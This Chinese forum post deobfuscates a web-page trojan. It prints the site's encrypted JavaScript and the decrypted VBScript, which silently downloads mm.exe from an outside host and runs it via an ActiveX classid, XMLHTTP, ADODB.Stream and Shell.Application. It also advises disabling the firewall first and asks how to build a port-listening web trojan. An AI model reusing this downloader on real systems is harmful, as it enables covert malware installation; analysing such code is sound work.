首先记下网页地址:http://evilman.cn/1.htm
先关掉所有浏览器,然后关闭防火墙, 打开记事本,CTRL+O,打开这个网页,看到如下源码:
<SCRIPT LANGUAGE="JavaScript">
<!--
function decrypt(str, pwd) {
if(str == null || str.length < 8) { alert("A salt value could not be extracted from the encrypted message because it's length is too short. The message cannot be decrypted."); return;
} if(pwd == null || pwd.length <= 0) { alert("Please enter a password with which to decrypt the message."); return; } var prand = ""; for(var i=0; i<pwd.length; i++) { prand += pwd.charCodeAt(i).toString(); } var sPos = Math.floor(prand.length / 5); var mult = parseInt(prand.charAt(sPos) + prand.charAt(sPos*2) + prand.charAt(sPos*3) + prand.charAt(sPos*4) + prand.charAt(sPos*5)); var incr = Math.round(pwd.length / 2); var modu = Math.pow(2, 31) - 1; var salt = parseInt(str.substring(str.length - 8, str.length), 16); str = str.substring(0, str.length - 8); prand += salt; while(prand.length > 10) { prand = (parseInt(prand.substring(0, 10)) + parseInt(prand.substring(10, prand.length))).toString(); } prand = (mult * prand + incr) % modu; var enc_chr = ""; var enc_str = ""; for(var i=0; i<str.length; i+=2) { enc_chr = parseInt(parseInt(str.substring(i, i+2), 16) ^ Math.floor((prand / modu) * 255)); enc_str += String.fromCharCode(enc_chr); prand = (mult * prand + incr) % modu; } return enc_str;}dl = "http://evilman.cn/mm.exe"var WangLuoQianJu="\x46\x38\x44\x32\x42\x46\x35\x44\x32\x34\x41\x32\x35\x41\x42\x34\x46\x36\x33\x37\x32\x43\x42\x33\x42\x30\x43\x33\x34\x43\x32\x41\x35\x46\x37\x33\x30\x39\x32\x38\x32\x33\x46\x45\x39\x30\x42\x34\x33\x34\x33\x38\x39\x37\x30\x34\x38\x38\x39\x36\x35\x36\x45\x30\x39\x35\x33\x42\x41\x31\x34\x32\x43\x45\x45\x42\x37\x39\x38\x35\x32\x30\x44\x42\x35\x31\x31\x31\x42\x33\x31\x32\x44\x43\x37\x38\x42\x46\x32\x36\x44\x36\x45\x45\x46\x37\x44\x35\x39\x41\x45\x41\x35\x30\x35\x34\x43\x37\x32\x44\x33\x31\x36\x37\x38\x37\x33\x33\x30\x30\x35\x41\x44\x46\x30\x44\x41\x31\x35\x38\x32\x39\x43\x34\x44\x32\x32\x44\x31\x42\x33\x42\x45\x36\x45\x31\x34\x38\x36\x37\x38\x41\x34\x34\x31\x33\x37\x46\x38\x38\x42\x30\x35\x31\x46\x44\x38\x41\x37\x39\x33\x31\x43\x34\x42\x33\x44\x38\x37\x31\x38\x31\x45\x43\x35\x32\x39\x44\x34\x35\x37\x42\x30\x36\x44\x42\x31\x44\x30\x33\x41\x46\x34\x45\x34\x34\x38\x38\x30\x31\x45\x33\x35\x42\x31\x41\x30\x46\x37\x37\x37\x37\x31\x42\x42\x31\x46\x36\x33\x39\x46\x41\x33\x42\x39\x44\x32\x44\x31\x46\x38\x46\x39\x30\x34\x44\x43\x31\x32\x46\x45\x39\x38\x37\x35\x35\x37\x33\x41\x35\x35\x43\x30\x42\x30\x33\x39\x34\x43\x39\x44\x33\x31\x30\x46\x30\x37\x33\x42\x46\x38\x41\x31\x32\x35\x32\x46\x37\x44\x36\x36\x44\x33\x33\x39\x43\x34\x33\x46\x45\x43\x33\x41\x33\x34\x41\x32\x35\x30\x45\x46\x46\x38\x30\x45\x31\x31\x34\x39\x30\x41\x42\x45\x31\x33\x31\x31\x35\x39\x36\x45\x36\x30\x42\x41\x43\x34\x32\x42\x41\x32\x33\x38\x42\x36\x41\x43\x44\x33\x37\x35\x38\x42\x31\x31\x37\x38\x42\x30\x44\x36\x46\x30\x32\x35\x45\x32\x35\x36\x44\x46\x32\x45\x35\x32\x46\x33\x31\x39\x32\x42\x30\x37\x41\x33\x31\x39\x42\x33\x36\x42\x38\x31\x44\x37\x34\x32\x39\x37\x36\x35\x45\x43\x32\x34\x38\x35\x32\x39\x39\x36\x31\x37\x30\x41\x44\x31\x33\x37\x37\x39\x45\x32\x36\x41\x43\x38\x38\x41\x36\x35\x42\x45\x42\x41\x34\x44\x31\x43\x38\x35\x30\x32\x33\x34\x36\x33\x45\x33\x41\x30\x38\x46\x41\x37\x31\x30\x34\x44\x43\x36\x39\x34\x44\x30\x41\x36\x35\x36\x33\x36\x32\x45\x41\x41\x43\x41\x34\x41\x31\x41\x41\x37\x33\x45\x43\x34\x43\x42\x43\x34\x32\x38\x36\x43\x31\x36\x41\x31\x45\x35\x32\x33\x37\x39\x37\x46\x41\x31\x35\x41\x34\x43\x34\x46\x33\x37\x42\x39\x33\x43\x37\x39\x30\x39\x46\x41\x37\x30\x38\x44\x30\x35\x39\x45\x32\x35\x33\x32\x44\x44\x34\x44\x30\x38\x34\x44\x43\x37\x45\x31\x30\x45\x46\x32\x31\x31\x45\x31\x43\x41\x39\x45\x43\x46\x36\x39\x32\x43\x41\x36\x32\x32\x34\x35\x45\x34\x45\x36\x43\x41\x39\x31\x43\x42\x33\x43\x44\x42\x34\x37\x33\x42\x33\x46\x33\x36\x36\x36\x42\x45\x38\x35\x36\x32\x32\x36\x46\x45\x30\x35\x41\x45\x41\x46\x45\x43\x30\x33\x45\x37\x41\x30\x34\x46\x35\x36\x43\x36\x42\x44\x36\x41\x38\x35\x30\x44\x46\x33\x34\x41\x36\x35\x38\x32\x34\x33\x36\x30\x46\x39\x32\x35\x30\x32\x41\x44\x34\x31\x34\x32\x38\x31\x45\x30\x33\x44\x45\x33\x33\x44\x43\x35\x43\x43\x36\x42\x35\x46\x33\x32\x46\x37\x30\x34\x35\x35\x37\x44\x42\x46\x32\x32\x37\x35\x42\x30\x42\x34\x43\x37\x43\x35\x39\x37\x46\x36\x41\x45\x42\x38\x42\x45\x42\x30\x46\x42\x34\x33\x37\x38\x38\x32\x32\x34\x45\x39\x32\x46\x43\x46\x35\x43\x37\x42\x35\x42\x30\x43\x39\x33\x42\x30\x36\x38\x32\x41\x32\x39\x36\x31\x30\x39\x34\x33\x44\x35\x32\x30\x46\x38\x32\x30\x30\x45\x46\x41\x38\x38\x44\x43\x37\x39\x42\x36\x41\x33\x31\x44\x35\x36\x30\x31\x30\x41\x39\x42\x46\x41\x37\x45\x36\x38\x37\x33\x30\x34\x37\x39\x45\x41\x44\x45\x31\x34\x46\x36\x32\x36\x41\x41\x34\x34\x34\x45\x46\x36\x36\x44\x39\x39\x35\x39\x31\x31\x41\x31\x38\x32\x44\x38\x31\x45\x30\x39\x36\x31\x34\x44\x44\x30\x39\x44\x45\x31\x30\x43\x35\x45\x30\x36\x38\x43\x30\x34\x32\x31\x33\x46\x35\x45\x45\x44\x44\x36\x39\x32\x36\x34\x37\x44\x41\x35\x37\x45\x41\x37\x42\x37\x41\x43\x45\x36\x38\x31\x42\x43\x41\x41\x34\x45\x37\x46\x45\x45\x44\x33\x41\x34\x35\x38\x46\x32\x38\x43\x31\x31\x34\x45\x39\x39\x39\x34\x34\x34\x43\x32\x33\x39\x33\x41\x38\x33\x45\x32\x34\x39\x41\x37\x33\x33\x39\x32\x34\x39\x39\x46\x37\x31\x35\x46\x38\x43\x30\x33\x39\x45\x33\x41\x33\x32\x39\x31\x41\x45\x31\x36\x41\x31\x34\x46\x32\x32\x30\x42\x34\x44\x34\x31\x38\x30\x38\x43\x38\x35\x32\x41\x34\x41\x35\x44\x42\x44\x45\x45\x32\x43\x44\x41\x41\x30\x39\x44\x30\x37\x44\x32\x44\x30\x46\x46\x44\x34\x39\x36\x41\x35\x33\x36\x37\x39\x37\x35\x46\x34\x30\x31\x42\x39\x33\x33\x32\x30\x37\x34\x37\x39\x35\x43\x41\x43\x41\x44\x34\x38\x46\x38\x35\x41\x31\x33\x37\x33\x42\x41\x38\x33\x44\x38\x34\x30\x39\x46\x39\x44\x41\x44\x41\x42\x38\x37\x37\x43\x44\x37\x44\x33\x42\x34\x35\x42\x36\x32\x41\x30\x30\x45\x32\x42\x37\x34\x42\x39\x42\x33\x39\x43\x32\x39\x38\x39\x38\x43\x38\x42\x39\x34\x38\x31\x33\x43\x42\x45\x43\x43\x41\x43\x37\x36\x38\x42\x44\x31\x43\x39\x41\x45\x31\x33\x42\x43\x45\x36\x44\x39\x44\x35\x32\x34\x39\x36\x45\x33\x42\x37\x38\x46\x35\x44\x35\x41\x30\x45\x32\x30\x43\x45\x33\x31\x46\x36\x44\x33\x46\x33\x41\x43\x46\x35\x30\x33\x30\x37\x43\x34\x44\x44\x44\x42\x30\x38\x34\x39\x32\x38\x37\x39\x31\x39\x42\x33\x35\x41\x32\x46\x43\x36\x46\x38\x41\x33\x45\x33\x37\x46\x34\x36\x45\x30\x44\x31\x41\x39\x31\x44\x44\x32\x35\x44\x43\x34\x45\x36\x37\x46\x46\x38\x42\x30\x34\x41\x35\x38\x45\x30\x35\x46\x45\x45\x30\x41\x46\x39\x32\x30\x30\x41\x30\x45\x38\x35\x35\x41\x45\x38\x46\x33\x30\x37\x39\x46\x43\x31\x30\x44\x32\x34\x46\x43\x45\x32\x38\x36\x37\x34\x45\x44\x43\x32\x42\x46\x41\x42\x34\x35\x46\x31\x41\x32\x45\x31\x38\x35\x30\x44\x32\x38\x44\x46\x30\x36\x44\x36\x36\x42\x42\x36\x43\x43\x33\x39\x46\x35\x36\x37\x41\x35\x41\x46\x43\x42\x46\x31\x34\x42\x37\x39\x30\x34\x34\x34\x34\x35\x43\x42\x30\x34\x36\x38\x43\x45\x42\x34\x35\x38\x44\x42\x41\x42\x39\x36\x34\x39\x33\x38\x35\x38\x33\x38\x31\x43\x44\x38\x35\x31\x37\x39\x35\x39\x42\x34\x43\x42\x30\x35\x46\x33\x37\x33\x41\x33\x42\x30\x33\x44\x42\x36\x36\x46\x41"document.write(decrypt(WangLuoQianJu,"3800"))
//-->
</SCRIPT>修改最后的
.document.write(decrypt(WangLuoQianJu,"3800"))//--></SCRIPT>更改为://--></SCRIPT><textarea id="tbSrc" style="100%;height:300px"></textarea><script type="text/javascript">document.getElementById("tbSrc").value = decrypt(WangLuoQianJu,"3800");</script><script language="VBScript">on error resume nextSet df = document.createElement("object")df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Set x = df.CreateObject(str,"")a1="Ado"a2="db."a3="Str"a4="eam"str1=a1&a2&a3&a4str5=str1set S = df.createobject(str5,"")S.type = 1str6="GET"x.Open str6, dl, Falsex.Sendfname1="g0ld.com"set F = df.createobject("Scripting.FileSystemObject","")set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1)S.openS.write x.responseBodyS.savetofile fname1,2S.closeset Q = df.createobject("Shell.Application","")Q.ShellExecute fname1,"","","open",0</script>后面还利用了XMLHTTP来下载木马,用FileSystemObject来保存文件,用Shell.Application来运行木马。
真像大白,我一直想知道那个利用网页,直接开端口监听的网页木马是如何做的,谁给告诉我点资料呀?